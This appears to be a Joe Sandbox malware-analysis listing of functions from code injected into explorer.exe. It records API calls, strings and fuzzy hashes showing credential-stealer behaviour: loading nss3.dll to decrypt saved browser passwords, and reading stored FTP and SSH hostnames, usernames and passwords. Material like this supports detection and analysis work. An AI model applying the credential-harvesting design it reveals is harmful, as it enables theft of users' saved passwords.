CoCreateInstance.COMBASE(00E562B0,00000000,00000001,00E562A0,?), ref: 00E0445F
SysAllocString.OLEAUT32(?), ref: 00E044AA
lstrcmpiW.KERNEL32(RecentServers,?), ref: 00E0456E
lstrcmpiW.KERNEL32(Servers,?), ref: 00E0457D
lstrcmpiW.KERNEL32(Settings,?), ref: 00E0458C

Part of subcall function 00E011E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,00E046E3), ref: 00E011ED
Part of subcall function 00E011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00E0120F
Part of subcall function 00E011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00E01231

lstrcmpiW.KERNEL32(Server,?), ref: 00E045BE
lstrcmpiW.KERNEL32(LastServer,?), ref: 00E045CD
lstrcmpiW.KERNEL32(Host,?), ref: 00E04657
lstrcmpiW.KERNEL32(Port,?), ref: 00E04679
lstrcmpiW.KERNEL32(User,?), ref: 00E0469F
lstrcmpiW.KERNEL32(Pass,?), ref: 00E046C5
wsprintfW.USER32 ref: 00E0471E

Strings

Pass, xrefs: 00E046C0
%s:%s, xrefs: 00E04718
Servers, xrefs: 00E04578
LastServer, xrefs: 00E045C8
User, xrefs: 00E0469A
Port, xrefs: 00E04674
Settings, xrefs: 00E04587
Host, xrefs: 00E04652
RecentServers, xrefs: 00E04569
Server, xrefs: 00E045B9

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
API String ID: 2230072276-1234691226
Opcode ID: e69b623e1f6cf4c474bb94ed4435e5a7fd800d4882945881457a4e5d50c9b100
Instruction ID: b18d45e24b21fc2c2a3fa804c3553a90eb749d2543758d0bd4e28e3fa330d333
Opcode Fuzzy Hash: e69b623e1f6cf4c474bb94ed4435e5a7fd800d4882945881457a4e5d50c9b100
Instruction Fuzzy Hash: 20B12AB1204302AFD700DF64C944E2AB7E9EFC9749F04995CF685AB1A0DB71ED4ACB52

Function 00E024B0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

Part of subcall function 00E01090: lstrlenW.KERNEL32(?,?,00000000,00E017E5), ref: 00E01097
Part of subcall function 00E01090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 00E010A8

Part of subcall function 00E019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00E02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00E019C4

GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00E02503
SetCurrentDirectoryW.KERNEL32(00000000), ref: 00E0250A
LoadLibraryW.KERNEL32(00000000), ref: 00E02563
SetCurrentDirectoryW.KERNEL32(?), ref: 00E02570
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00E02591
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 00E0259E
GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 00E025AB
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 00E025B8
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 00E025C5
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 00E025D2
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 00E025DF

Part of subcall function 00E0190B: lstrlen.KERNEL32(?,?,?,?,00000000,00E02783), ref: 00E0192B
Part of subcall function 00E0190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00E02783), ref: 00E01930
Part of subcall function 00E0190B: lstrcat.KERNEL32(00000000,?), ref: 00E01946
Part of subcall function 00E0190B: lstrcat.KERNEL32(00000000,00000000), ref: 00E0194A

Strings

PK11SDR_Decrypt, xrefs: 00E025C7
PK11_GetInternalKeySlot, xrefs: 00E025AD
nss3.dll, xrefs: 00E02510
PK11_Authenticate, xrefs: 00E025BA
PK11_FreeSlot, xrefs: 00E025D4
sql:, xrefs: 00E0262B
SECITEM_FreeItem, xrefs: 00E025A0
NSS_Shutdown, xrefs: 00E02593
NSS_Init, xrefs: 00E0258B

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
API String ID: 3366569387-3272982511
Opcode ID: 267c559ea86bbf64fbfe20bbe26bf20001865eb40fa9f8a2e54f75413a8f1da5
Instruction ID: cb72ed5b8aeb579fbef39a5dbcd0918239008789381ab3d0d7f359ff93ab46af
Opcode Fuzzy Hash: 267c559ea86bbf64fbfe20bbe26bf20001865eb40fa9f8a2e54f75413a8f1da5
Instruction Fuzzy Hash: DA416830F003018FCB25AF367C5852F3AE9DF8478674814AEE941B72E1DBB58C898B51

Function 00E05E5A Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 382COMMON

Download Yara Rule

APIs

Part of subcall function 00E05BF5: memset.NTDLL ref: 00E05C07

_alldiv.NTDLL(?,?,05265C00,00000000), ref: 00E060E1
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 00E060EC
_alldiv.NTDLL(?,?,000003E8,00000000), ref: 00E06113
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 00E0618E
_alldiv.NTDLL(?,?,05265C00,00000000), ref: 00E061B5
_allrem.NTDLL(00000000,?,00000007,00000000), ref: 00E061C1

Strings

%.16g, xrefs: 00E06077
%04d, xrefs: 00E06016
%lld, xrefs: 00E06122
W, xrefs: 00E06193
%02d, xrefs: 00E06039, 00E061D3
%06.3f, xrefs: 00E06229
%03d, xrefs: 00E061F3

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: _alldiv$_allrem$memset
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
API String ID: 2557048445-1989508764
Opcode ID: 902e461341858612ef1576bfc8dd0c677462b28c88a482aa3128c6cea56c84ac
Instruction ID: 4d1da7d6f0f4216fab17b71f74c3c2589375d93e15f3353cabd9cb47ec9aa951
Opcode Fuzzy Hash: 902e461341858612ef1576bfc8dd0c677462b28c88a482aa3128c6cea56c84ac
Instruction Fuzzy Hash: 44B160B3A087439BD7359E24CC85B7B7BD4EB40308F242959F8C2B61E1E761DDE48A91

Function 00E1D2AC Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 169COMMON

Download Yara Rule

APIs

memcmp.NTDLL(00E5637A,BINARY,00000007), ref: 00E1D324

Strings

k(%d, xrefs: 00E1D2EE
%.16g, xrefs: 00E1D3E5
(blob), xrefs: 00E1D416
,%d, xrefs: 00E1D444
%lld, xrefs: 00E1D3CA
%s(%d), xrefs: 00E1D3AB
vtab:%p, xrefs: 00E1D423
(%.20s), xrefs: 00E1D38A
NULL, xrefs: 00E1D40F
BINARY, xrefs: 00E1D31E
program, xrefs: 00E1D46A
,%s%s, xrefs: 00E1D34E

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: memcmp
String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 1475443563-3683840195
Opcode ID: 0429deddcc341e6dbfd104494e3ab9e4810b41a1815f2090c204d92c6e0773a6
Instruction ID: feab803a0fedecbc175caa4fd690c506ec9117ffa04f2a8f5856485aa8aa1201
Opcode Fuzzy Hash: 0429deddcc341e6dbfd104494e3ab9e4810b41a1815f2090c204d92c6e0773a6
Instruction Fuzzy Hash: 2751D331A0C700ABC721DF54DC41AEAB3E5AB45701F146C69FDA2BB141E770ED99CBA2

Function 00E048B1 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00E019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A1E
Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A3C
Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A75
Part of subcall function 00E019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A98

Part of subcall function 00E0482C: lstrlenW.KERNEL32(?), ref: 00E04845
Part of subcall function 00E0482C: lstrlenW.KERNEL32(?), ref: 00E0488F
Part of subcall function 00E0482C: lstrlenW.KERNEL32(?), ref: 00E04897

wsprintfW.USER32 ref: 00E049A7
wsprintfW.USER32 ref: 00E049B9

Strings

HostName, xrefs: 00E048C4
%s:%u, xrefs: 00E04971, 00E049B7
Password, xrefs: 00E048E4
%s:%u/%s, xrefs: 00E04982, 00E049A5
RemoteDirectory, xrefs: 00E048F8
UserName, xrefs: 00E048D2

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: lstrlen$QueryValuewsprintf$CloseOpen
String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
API String ID: 2889301010-4273187114
Opcode ID: 9f968f9d95b736cd67c613c1f5b0865f045f7c50eaaa0a1ab5f3415ef4b62b9c
Instruction ID: 53585a42421da78e0db231c8699e6ba4c1646ede61a66d7210c57731b2a219b8
Opcode Fuzzy Hash: 9f968f9d95b736cd67c613c1f5b0865f045f7c50eaaa0a1ab5f3415ef4b62b9c
Instruction Fuzzy Hash: BF3124E0B043055BC710AF66CD0182BB6EDEFC974CB85A96DF644B72C1DAB2CC8183A1

Function 00E0F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?,00000000), ref: 00E0FB32
memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00E0FB4D
memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00E0FB60
memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 00E0FB95

Strings

-wal, xrefs: 00E0FBA9
nolock, xrefs: 00E0FC4E
-journal, xrefs: 00E0FB6B
immutable, xrefs: 00E0FC68

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: memcpy
String ID: -journal$-wal$immutable$nolock
API String ID: 3510742995-3408036318
Opcode ID: 7f334f584d329b74f9e39c11a3435e5addb00f957ee05678dad1220ce380e226
Instruction ID: 65e753018e2d49c0a28a3c6f0b81330fcb22d7e2cc55058b2407d4bc23e16bfa
Opcode Fuzzy Hash: 7f334f584d329b74f9e39c11a3435e5addb00f957ee05678dad1220ce380e226
Instruction Fuzzy Hash: B3D1D2B16083418FDB24DF24C88171ABBE1AF95314F08597DFC98AB392DB74D845CB52

Function 00E07820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

-x0, xrefs: 00E07325
NaN, xrefs: 00E073F8
%, xrefs: 00E07822

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID:
String ID: %$-x0$NaN
API String ID: 0-62881354
Opcode ID: 24b8b6b41cd87a0a3314c73a92ec319f2312a94ac4bad9a6d58bde2eb37d37dd
Instruction ID: fd9a44e416294fd9f79832bae4fb6dc195532c859887d3d40dea9f112aea3fed
Opcode Fuzzy Hash: 24b8b6b41cd87a0a3314c73a92ec319f2312a94ac4bad9a6d58bde2eb37d37dd
Instruction Fuzzy Hash: D1D1E470E0C3828BD7258E28849036BBFE1AF95308F28695DF8C1B72D1D674E9C5D792

Function 00E01895 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.COMBASE(?,?), ref: 00E018A7
GlobalLock.KERNEL32(WK), ref: 00E018B6
GlobalUnlock.KERNEL32(?), ref: 00E018F4

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00E018E8

Strings

WK, xrefs: 00E018B2
WK, xrefs: 00E018CA

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
String ID: WK$WK
API String ID: 1688112647-3649781841
Opcode ID: 4ba4b01c3f17e6a9fc279264c8419fb91d4c21d7c87807ac24d8710b51d0c343
Instruction ID: d368e4fbdbc3e483e6ee782e21afc2ade7f8f330d6d2632dfa9c16d034c330f4
Opcode Fuzzy Hash: 4ba4b01c3f17e6a9fc279264c8419fb91d4c21d7c87807ac24d8710b51d0c343
Instruction Fuzzy Hash: 0C018675204345AFCB155F66DC1885F7BE9EF84355B00953EF445EB2A1DF31C9449B20

Function 00E078B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

-x0, xrefs: 00E07325
NaN, xrefs: 00E073F8

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: a8e70d36553cda8c5af3a9969e6d116a3a3d8b0a87bd80d49425060d44de6503
Instruction ID: 90c1421b6687f4af9228c87a48159bdc48fdde9660b354742062136661169656
Opcode Fuzzy Hash: a8e70d36553cda8c5af3a9969e6d116a3a3d8b0a87bd80d49425060d44de6503
Instruction Fuzzy Hash: 39E10270E0C3828BD7258E28849036BBBE1AF95348F28695DF8C1B72D1D674EDC5C792

Function 00E07A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

-x0, xrefs: 00E07325
NaN, xrefs: 00E073F8

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: c2862ac0b23d84769b0f1f6fc479763a10df6a3473dd06207bb3b2605e5f53da
Instruction ID: b35d4c1fd96aad854fa9eba4cd1e3fe386a41f31839438c2a72e52c8364dd4a2
Opcode Fuzzy Hash: c2862ac0b23d84769b0f1f6fc479763a10df6a3473dd06207bb3b2605e5f53da
Instruction Fuzzy Hash: C2E1C270A0C3828BD7258E28C49076ABBE1AF95308F14695DF8C1B73D1D674EDC5DB92

Function 00E07A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

-x0, xrefs: 00E07325
NaN, xrefs: 00E073F8

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 2748b0ccd09b257a0143c486d80fc9166ad4af7e1ecbec091a6be5d8a49e06d7
Instruction ID: 16e815d2c3aae95bbee8a6600a5a188a4ff0615358eb64f2ac2c9211d57b7cd6
Opcode Fuzzy Hash: 2748b0ccd09b257a0143c486d80fc9166ad4af7e1ecbec091a6be5d8a49e06d7
Instruction Fuzzy Hash: 19E1D370E0C3828BD7258E28C49076ABBE1AF95308F18695DF8C1B72D1D674E9C5DB92

Function 00E077F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON

Download Yara Rule

Strings

-x0, xrefs: 00E07325
NaN, xrefs: 00E073F8

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: eb9238d6f575c45d3d7045a06b3fded67c485412d9ad67b7af94433af3d8b09d
Instruction ID: 630549b30a8191453abc9024fb177ee9bc3a54e28bae8a91463d071782ee8c8e
Opcode Fuzzy Hash: eb9238d6f575c45d3d7045a06b3fded67c485412d9ad67b7af94433af3d8b09d
Instruction Fuzzy Hash: AEE1C370A0C3828FD7258E28C49076ABBE1AF99308F14695DF8C1B72D1D674E9C5DB52

Function 00E070C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON

Download Yara Rule

APIs

_aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 00E0720E
_aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00E07226
_aulldvrm.NTDLL(00000000,00000000,?), ref: 00E0727B

Strings

-x0, xrefs: 00E07325
NaN, xrefs: 00E073F8

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: _aulldvrm$_aullrem
String ID: -x0$NaN
API String ID: 105165338-3447725786
Opcode ID: 4d12177be524f723d4213d58026a5e1cf15b6c3864f62ee84cc740538ccfeb5d
Instruction ID: c7081ad4cc13b51a827411b9e79f4c1c9242792fa5807d73225c7d64d722d146
Opcode Fuzzy Hash: 4d12177be524f723d4213d58026a5e1cf15b6c3864f62ee84cc740538ccfeb5d
Instruction Fuzzy Hash: 13D1D370E0C3828BD7258E28849076ABFE1AF95308F28695DF8C1B72D1D674EDC5D792

Function 00E0898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON

Download Yara Rule

APIs

_allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00E08AAD
_allmul.NTDLL(?,?,0000000A,00000000), ref: 00E08B66
_allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00E08C9B
_alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00E08CAE

Strings

., xrefs: 00E08B17

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: _allmul$_alldvrm
String ID: .
API String ID: 115548886-248832578
Opcode ID: a53c6e23925d7b5495c6b0c228a36da531ff9e728667803b40e1a0c9dd9225bc
Instruction ID: d5f466f6d87485e6d7235681e73918bc4a22c6b59038c27bbb1236a6f5e64b4f
Opcode Fuzzy Hash: a53c6e23925d7b5495c6b0c228a36da531ff9e728667803b40e1a0c9dd9225bc
Instruction Fuzzy Hash: 68D1F4B190C7858BD714DF48868022AFBF4FBA5315F042D6EF6D5B62C1DBB08985CB86

Function 00E2D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00E2D6A0
memset.NTDLL ref: 00E2D6B3
memset.NTDLL ref: 00E2D6C3

Strings

,, xrefs: 00E2D6FC
9, xrefs: 00E2D701
7, xrefs: 00E2D71B

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: memset
String ID: ,$7$9
API String ID: 2221118986-1653249994
Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction ID: 10f352e0284791a3610a22b246f24fe05258863cf3e1684ea5e793f8a2a1bba1
Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction Fuzzy Hash: D6316B725083949FD334DF60D840B8FBBE8AF85340F10892EF989A7251EB75954CCBA2

Function 00E01BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01BCC
StrStrIW.SHLWAPI(00000000,.exe,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01BF0
StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01C05
lstrlenW.KERNEL32(00000000,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01C1C

Strings

.exe, xrefs: 00E01BEA

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: lstrlen
String ID: .exe
API String ID: 1659193697-4119554291
Opcode ID: a44b1b3611b0eabc4ef538e83c02e1e7a57352295353a9e13bf56f606b41d59f
Instruction ID: 7265de4533e8f1cfdf0461799748ac4411c7605c3b9503c1b7165d7c35b5a01c
Opcode Fuzzy Hash: a44b1b3611b0eabc4ef538e83c02e1e7a57352295353a9e13bf56f606b41d59f
Instruction Fuzzy Hash: D0F0C2303517209EE3386F359C85BBBA2A4EF013467506CAEE046EB1E1FB60CC85C759

Function 00E02112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00E02127
_alldiv.NTDLL(?,?,00989680,00000000), ref: 00E0213A
wsprintfA.USER32 ref: 00E0214F

Strings

%li, xrefs: 00E02149

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
String ID: %li
API String ID: 4120667308-1021419598
Opcode ID: 3308fc4617f7f0469ba55f697240ed77d0243cdb8e2076f6929b479ddd3bb8ee
Instruction ID: 2da3acdc21a738c44b010312c72b3a7808b8d9d7cfcc661cbf985621711a8fec
Opcode Fuzzy Hash: 3308fc4617f7f0469ba55f697240ed77d0243cdb8e2076f6929b479ddd3bb8ee
Instruction Fuzzy Hash: 03E092326413187BD7213BB89D06EAE7B6CDB40B17F404A95FA04B6182E5624A6883D5

Function 00E12FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000018), ref: 00E1316F
_allmul.NTDLL(-00000001,00000000,?,?), ref: 00E131D2
_alldiv.NTDLL(?,?,00000000), ref: 00E132DE
_allmul.NTDLL(00000000,?,00000000), ref: 00E132E7
_allmul.NTDLL(?,00000000,?,?), ref: 00E13392

Part of subcall function 00E116CD: memset.NTDLL ref: 00E1172B

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: _allmul$_alldivmemset
String ID:
API String ID: 3880648599-0
Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction ID: 2f1c59a45451c6b7c44af75651b54bc1d246f5ab66508b85ecf8607e17992de8
Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction Fuzzy Hash: 75D1AE716083418FDB24DF69C4807AEB7E1BF88708F14592DF9A5A3251DB70DE85CB92

Function 00E387FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON

Download Yara Rule

Strings

new, xrefs: 00E388AA
old, xrefs: 00E3889E
FOREIGN KEY constraint failed, xrefs: 00E38AC8

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID:
String ID: FOREIGN KEY constraint failed$new$old
API String ID: 0-384346570
Opcode ID: 286490db8e10b04a5b51844ac13b3ab66268f333705dfd1912501918f6632175
Instruction ID: 5d32629277a09d2c24db0e84e651897aed34425275619fb1d3a9b533e1bc6cbb
Opcode Fuzzy Hash: 286490db8e10b04a5b51844ac13b3ab66268f333705dfd1912501918f6632175
Instruction Fuzzy Hash: EDD179707083009FD718DF24D985B2FBBE9ABC8744F14692EF985AB291DB70D841CB92

Function 00E096BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 00E096E7
_alldiv.NTDLL(00000000,80000000,?,?), ref: 00E09707
_alldiv.NTDLL(00000000,80000000,?,?), ref: 00E09739
_alldiv.NTDLL(00000001,80000000,?,?), ref: 00E0976C
_allmul.NTDLL(?,?,?,?), ref: 00E09798

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: _alldiv$_allmul
String ID:
API String ID: 4215241517-0
Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction ID: f95b0805e9af9a61f5743e88d0a8ba4f5eba074eb7eb786f4ac6733d9c900994
Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction Fuzzy Hash: 9121E1331286552AD7345D199CD0B6B76C8CB91799F2C752FFD11B22E3E99388C180A2

Function 00E1B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000), ref: 00E1B1B3
_alldvrm.NTDLL(?,?,00000000), ref: 00E1B20F
_allrem.NTDLL(?,00000000,?,?), ref: 00E1B28A
memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 00E1B298

Memory Dump Source

Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e01000_explorer.jbxd

Similarity

API ID: _alldvrm_allmul_allremmemcpy
String ID:
API String ID: 1484705121-0
Opcode ID: 7f149f4fafbbaf87986fcdd5fa071cfd5fd9f51ff2967b4dfa165bb06474c4bd
Instruction ID: 47638823bd8c72665011213cc7126d859632297125bfccd726482b6135b2a9b8
Opcode Fuzzy Hash: 7f149f4fafbbaf87986fcdd5fa071cfd5fd9f51ff2967b4dfa165bb06474c4bd
Instruction Fuzzy Hash: B64138756083419FC714EF25C89196FB7E5AFC8304F04692DF995A7262EB30EC89CB52

Function 00E01953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,?,?,00E02F0C), ref: 00E01973
